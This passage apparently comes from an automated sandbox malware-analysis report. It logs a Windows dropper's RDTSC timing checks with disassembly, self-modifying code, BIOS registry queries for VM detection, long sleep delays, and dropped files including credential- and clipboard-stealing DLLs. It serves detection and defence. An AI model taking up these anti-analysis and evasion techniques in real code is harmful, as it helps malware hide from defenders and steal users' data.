0x00000061 jmp 00007F17B0FBC275h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54205BA second address: 54205F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 pushad 0x0000000a movsx ebx, cx 0x0000000d jmp 00007F17B0CB142Eh 0x00000012 popad 0x00000013 sub esp, 1Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F17B0CB1437h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54205F2 second address: 54205F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54205F8 second address: 54205FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54205FC second address: 5420680 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F17B0FBC26Dh 0x00000017 xchg eax, ebx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F17B0FBC26Ch 0x0000001f and ecx, 6BBBFEF8h 0x00000025 jmp 00007F17B0FBC26Bh 0x0000002a popfd 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F17B0FBC276h 0x00000032 sub esi, 56625958h 0x00000038 jmp 00007F17B0FBC26Bh 0x0000003d popfd 0x0000003e movzx eax, dx 0x00000041 popad 0x00000042 popad 0x00000043 push esi 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F17B0FBC26Ah 0x0000004d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420680 second address: 542068F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB142Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 542068F second address: 54206BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F17B0FBC26Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54206BE second address: 5420706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F17B0CB142Eh 0x0000000f push eax 0x00000010 jmp 00007F17B0CB142Bh 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F17B0CB1435h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420706 second address: 5420716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0FBC26Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420716 second address: 5420763 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [76FBB370h] 0x0000000d jmp 00007F17B0CB1437h 0x00000012 xor dword ptr [ebp-08h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 movsx ebx, si 0x0000001b pushfd 0x0000001c jmp 00007F17B0CB142Ch 0x00000021 or esi, 511366C8h 0x00000027 jmp 00007F17B0CB142Bh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420763 second address: 54207BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 movsx ebx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor eax, ebp 0x0000000d jmp 00007F17B0FBC273h 0x00000012 nop 0x00000013 jmp 00007F17B0FBC276h 0x00000018 push eax 0x00000019 jmp 00007F17B0FBC26Bh 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F17B0FBC275h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54207BE second address: 5420821 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F17B0CB1437h 0x00000008 pop esi 0x00000009 mov ax, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f lea eax, dword ptr [ebp-10h] 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007F17B0CB142Ah 0x00000019 pushfd 0x0000001a jmp 00007F17B0CB1432h 0x0000001f and eax, 7E1AD2A8h 0x00000025 jmp 00007F17B0CB142Bh 0x0000002a popfd 0x0000002b popad 0x0000002c popad 0x0000002d mov dword ptr fs:[00000000h], eax 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420821 second address: 5420827 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420827 second address: 542083E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB142Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 542083E second address: 542085B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 542085B second address: 542086B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0CB142Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 542086B second address: 5420904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+10h] 0x0000000b pushad 0x0000000c mov di, 04B0h 0x00000010 jmp 00007F17B0FBC279h 0x00000015 popad 0x00000016 test eax, eax 0x00000018 pushad 0x00000019 mov dx, ax 0x0000001c push esi 0x0000001d pushfd 0x0000001e jmp 00007F17B0FBC26Fh 0x00000023 adc cl, FFFFFFBEh 0x00000026 jmp 00007F17B0FBC279h 0x0000002b popfd 0x0000002c pop eax 0x0000002d popad 0x0000002e jne 00007F1822A5B6BFh 0x00000034 jmp 00007F17B0FBC277h 0x00000039 sub eax, eax 0x0000003b pushad 0x0000003c mov bl, D0h 0x0000003e jmp 00007F17B0FBC26Eh 0x00000043 popad 0x00000044 mov dword ptr [ebp-20h], eax 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420904 second address: 542090B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov al, bh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 542090B second address: 542099F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F17B0FBC26Bh 0x00000009 or eax, 376688DEh 0x0000000f jmp 00007F17B0FBC279h 0x00000014 popfd 0x00000015 mov ecx, 6029A7A7h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ebx, dword ptr [esi] 0x0000001f pushad 0x00000020 mov dx, si 0x00000023 mov edx, eax 0x00000025 popad 0x00000026 mov dword ptr [ebp-24h], ebx 0x00000029 pushad 0x0000002a mov di, cx 0x0000002d pushfd 0x0000002e jmp 00007F17B0FBC278h 0x00000033 sbb al, 00000038h 0x00000036 jmp 00007F17B0FBC26Bh 0x0000003b popfd 0x0000003c popad 0x0000003d test ebx, ebx 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 mov bh, 9Bh 0x00000044 pushfd 0x00000045 jmp 00007F17B0FBC26Ch 0x0000004a xor ch, FFFFFF98h 0x0000004d jmp 00007F17B0FBC26Bh 0x00000052 popfd 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 542099F second address: 54209A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410EC9 second address: 5410F26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 pushfd 0x00000007 jmp 00007F17B0FBC26Bh 0x0000000c sub ax, 361Eh 0x00000011 jmp 00007F17B0FBC279h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007F17B0FBC271h 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F17B0FBC26Eh 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410F26 second address: 5410F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410F2A second address: 5410F2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410F2E second address: 5410F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410F34 second address: 5410F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0FBC26Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: CB072B second address: CB072F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: CB072F second address: CB0761 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC278h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F17B0FBC273h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: CC7A2A second address: CC7A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17B0CB1430h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: CC7A40 second address: CC7A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: CC7A45 second address: CC7A67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F17B0CB1426h 0x00000013 jmp 00007F17B0CB142Fh 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: CC7A67 second address: CC7A71 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: CC7A71 second address: CC7A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F17B0CB1426h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: CC7BE4 second address: CC7BFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F17B0FBC26Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: CC7BFD second address: CC7C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Special instruction interceptor: First address: CAEC6E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Special instruction interceptor: First address: E5F914 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Special instruction interceptor: First address: EF0762 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: B3EC6E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: CEF914 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: D80762 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: D6B995 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: F25D6E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: FAA64E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Special instruction interceptor: First address: 78B995 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Special instruction interceptor: First address: 945D6E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Special instruction interceptor: First address: 9CA64E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Special instruction interceptor: First address: CD5B03 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Special instruction interceptor: First address: CD59FF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Special instruction interceptor: First address: E7071C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Special instruction interceptor: First address: E7039A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Special instruction interceptor: First address: E978BA instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 785B03 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 7859FF instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 92071C instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 92039A instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 9478BA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 435B03 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 4359FF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 5D071C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 5D039A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 5F78BA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_05470C1D rdtsc 0_2_05470C1D
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 180000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Thread delayed: delay time: 180000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4858
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4988
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Window / User API: threadDelayed 1127
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Window / User API: threadDelayed 453
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8771
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 590
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Window / User API: threadDelayed 1260
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Window / User API: threadDelayed 355
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Window / User API: threadDelayed 469
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\cred64[1].dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[1].dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[2].dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\sarra[1].exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cred64[1].dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6808 Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6808 Thread sleep time: -62031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7216 Thread sleep time: -54027s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7076 Thread sleep count: 202 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7076 Thread sleep time: -6060000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7184 Thread sleep count: 36 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7184 Thread sleep time: -72036s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5460 Thread sleep count: 41 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 5460 Thread sleep time: -82041s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 2004 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 2840 Thread sleep time: -58029s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 4416 Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 4416 Thread sleep time: -62031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7076 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6236 Thread sleep time: -59000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6128 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 7916 Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 7920 Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 7772 Thread sleep count: 132 > 30
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 7772 Thread sleep time: -3960000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 2360 Thread sleep time: -1080000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 7772 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8048 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe TID: 4500 Thread sleep count: 83 > 30
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe TID: 4828 Thread sleep count: 32 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6448 Thread sleep count: 37 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6448 Thread sleep time: -37000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2120 Thread sleep count: 8771 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4008 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2120 Thread sleep count: 590 > 30
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe TID: 8104 Thread sleep count: 1260 > 30
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe TID: 8104 Thread sleep count: 355 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7740 Thread sleep count: 47 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6016 Thread sleep count: 47 > 30
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe TID: 4948 Thread sleep count: 36 > 30
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe TID: 4948 Thread sleep count: 111 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8112 Thread sleep count: 44 > 30
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8112 Thread sleep count: 98 > 30
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe TID: 2648 Thread sleep count: 469 > 30
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Thread sleep count: Count: 1127 delay: -10
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Thread sleep count: Count: 1260 delay: -10
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Thread delayed: delay time: 30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\OneDrive\desktop.ini
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Videos\desktop.ini
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Music\desktop.ini
